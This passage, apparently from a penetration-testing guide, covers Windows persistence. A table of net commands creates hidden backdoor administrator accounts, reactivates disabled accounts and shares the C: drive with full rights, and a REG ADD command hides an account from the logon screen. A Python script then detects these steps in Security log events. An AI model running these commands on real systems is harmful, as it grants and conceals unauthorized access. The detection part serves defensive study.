The following commands are highly invasive and are usually detected by the system owner during the incident response process. However, they are frequently planted by an attacker to draw attention away from more persistent access mechanisms. Refer to the following table:
| Command | Description |
| --- | --- |
| `net user attacker password /add` / `net user testuser testpassword /ADD /DOMAIN` | Creates a new local account with a user called attacker and a password set to password. The second form, with `/DOMAIN`, adds the user to the domain instead if you are running the command on a domain controller. |
| `net localgroup administrators attacker /add` | Adds the user called attacker to the local Administrators group. In some cases, the command will be `net localgroup administrators /add attacker`. |
| `net user username /active:yes /domain` | Changes an inactive or disabled account to active. In a small organization, this will attract attention. Large enterprises with poor account management can have 30% of their accounts flagged as inactive, so it may be an effective way to gain an account. |
| `net share name$=C: /grant:attacker,FULL /unlimited` | Shares C: (or another specified drive) as a Windows share, and grants the user (attacker) full rights to access or modify all of the content on that drive. |
If you create a new user account, it will be noticed when anyone logs onto the welcome screen of the compromised system. To make the account invisible, you need to modify the registry from the command line using the following REG command:
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /V account_name /T REG_DWORD /D 0
This adds a REG_DWORD value named after the account (/V) with data 0 (/D 0) under the UserList key, which hides that account from the welcome screen. The account remains visible to `net user` and in Local Users and Groups, so the presence of this key and value is itself a useful indicator of compromise. Again, there may be special syntax requirements based on the specific version of the target's operating system, so determine the Windows version first and then validate it in a controlled test environment before implementing it against the target.
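The commands in the table above and the UserList registry change all leave a trace in the Windows Security log: account creation (event 4720), account enablement (4722), membership added to a local group (4732), a share being created (5142, which needs File Share auditing enabled) and a registry value being written (4657, which needs an object-access SACL on the Winlogon key). The following detection script is an added example, not code from the original text; it runs over constructed event records whose field names (`target`, `group`, `object`, `value_name`, `new_value`, `share`) are simplified stand-ins for the real `TargetUserName`, `GroupName`, `ObjectName`, `ObjectValueName`, `NewValue` and `ShareName` fields, and it correlates a newly created account with an elevation or hiding step within a time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Windows Security log event IDs (real values).
ACCOUNT_CREATED = 4720           # A user account was created
ACCOUNT_ENABLED = 4722           # A user account was enabled
LOCAL_GROUP_MEMBER_ADDED = 4732  # A member was added to a security-enabled local group
SHARE_ADDED = 5142               # A network share object was added
REGISTRY_VALUE_MODIFIED = 4657   # A registry value was modified

# Tail of the key the page's REG ADD command writes to (compared case-insensitively).
USERLIST_SUFFIX = r"\winlogon\specialaccounts\userlist"
# Shares that exist by default on Windows and should not be flagged.
DEFAULT_ADMIN_SHARE = re.compile(r"^(?:[a-z]\$|admin\$|ipc\$|print\$)$", re.I)

# Constructed sample events (not real log data); field names are simplified.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 4720, "subject": "svc_backup", "target": "attacker"},
    {"time": "2024-05-01T10:00:05", "id": 4732, "subject": "svc_backup", "target": "attacker",
     "group": "Administrators"},
    {"time": "2024-05-01T10:00:30", "id": 4657, "subject": "svc_backup",
     "object": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Winlogon\SpecialAccounts\UserList",
     "value_name": "attacker", "new_value": "0"},
    {"time": "2024-05-01T10:01:00", "id": 5142, "subject": "svc_backup", "share": r"\\*\backup$"},
    {"time": "2024-05-01T10:02:00", "id": 5142, "subject": "SYSTEM", "share": r"\\*\C$"},
    {"time": "2024-05-02T09:00:00", "id": 4720, "subject": "helpdesk", "target": "jdoe"},
    {"time": "2024-05-02T09:30:00", "id": 4722, "subject": "helpdesk", "target": "svc_old"},
]


def classify(event):
    """Map one event to (account, tag) if it is one of the steps we care about."""
    eid = event["id"]
    if eid == ACCOUNT_CREATED:
        return event["target"], "created"
    if eid == ACCOUNT_ENABLED:
        return event["target"], "enabled"
    if eid == LOCAL_GROUP_MEMBER_ADDED and event.get("group", "").lower() == "administrators":
        return event["target"], "local_admin"
    if (eid == REGISTRY_VALUE_MODIFIED
            and event.get("object", "").lower().endswith(USERLIST_SUFFIX)
            and event.get("new_value") == "0"):
        # The value name under UserList is the account being hidden.
        return event["value_name"], "hidden_from_logon"
    return None


def account_findings(events, window=timedelta(hours=1)):
    """Return accounts that were created and, within `window`, also made local
    admin or hidden from the logon screen, together with every tag seen."""
    per_account = defaultdict(list)
    for ev in events:
        hit = classify(ev)
        if hit:
            acct, tag = hit
            per_account[acct.lower()].append((datetime.fromisoformat(ev["time"]), tag))
    alerts = []
    for acct, hits in per_account.items():
        tags = {t for _, t in hits}
        if "created" not in tags:
            continue  # enabling or elevating an existing account is reviewed separately
        created_at = min(ts for ts, t in hits if t == "created")
        suspicious = {t for ts, t in hits
                      if t in ("local_admin", "hidden_from_logon")
                      and timedelta(0) <= ts - created_at <= window}
        if suspicious:
            alerts.append({"account": acct, "tags": sorted(tags),
                           "created": created_at.isoformat()})
    return sorted(alerts, key=lambda a: a["account"])


def share_findings(events):
    """Return newly created hidden shares (name ends in '$') that are not defaults."""
    out = []
    for ev in events:
        if ev["id"] != SHARE_ADDED:
            continue
        name = ev["share"].rsplit("\\", 1)[-1]
        if name.endswith("$") and not DEFAULT_ADMIN_SHARE.match(name):
            out.append({"share": name, "by": ev["subject"], "time": ev["time"]})
    return out


if __name__ == "__main__":
    for alert in account_findings(SAMPLE_EVENTS):
        print("account alert:", alert)
    for share in share_findings(SAMPLE_EVENTS):
        print("share alert:", share)
```

On the sample data the only account alert is `attacker` (created, then made local admin and hidden within a minute), while `jdoe` and `svc_old` produce nothing; the only share alert is `backup$`, because `C$` is a default administrative share. In a real deployment the event records would come from a log shipper or `Get-WinEvent` export, and the window should be tuned to the environment's normal provisioning pace.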